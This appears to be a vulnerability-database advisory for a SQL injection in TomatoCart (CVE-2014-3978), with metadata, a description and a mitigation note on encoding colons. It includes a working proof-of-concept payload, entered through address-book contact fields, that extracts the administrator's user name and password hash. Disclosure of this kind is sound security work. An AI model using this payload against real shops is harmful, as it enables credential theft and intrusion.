vendor:
TomatoCart
by:
Breaking Technology
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: TomatoCart
Affected Version From: TomatoCart V1.1.8.6.1
Affected Version To: TomatoCart V2.0 Alpha 4
Patch Exists: YES
Related CWE: CVE-2014-3978
CPE: a:tomatocart:tomatocart
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2014
TomatoCart v1.x (latest-stable) Remote SQL Injection Vulnerability
TomatoCart suffers from a systemic vulnerability in its query factory, allowing attackers to circumvent user input sanitizing to perform remote SQL injection. Required Information: Valid user account. PoC: Create a new contact in your address book using the following values. First name: :entry_lastname, Last Name : ,(select user_name from toc_administrators order by id asc limit 1),(select user_password from toc_administrators order by id asc limit 1),3,4,5,6,7,8,9,10)# The new contact will be added to your address book with the admin hash as the contact's street address.
Mitigation:
Pull request has been sent to the developers on github. Recommend patching the required to properly encode colon (:) characters in user input.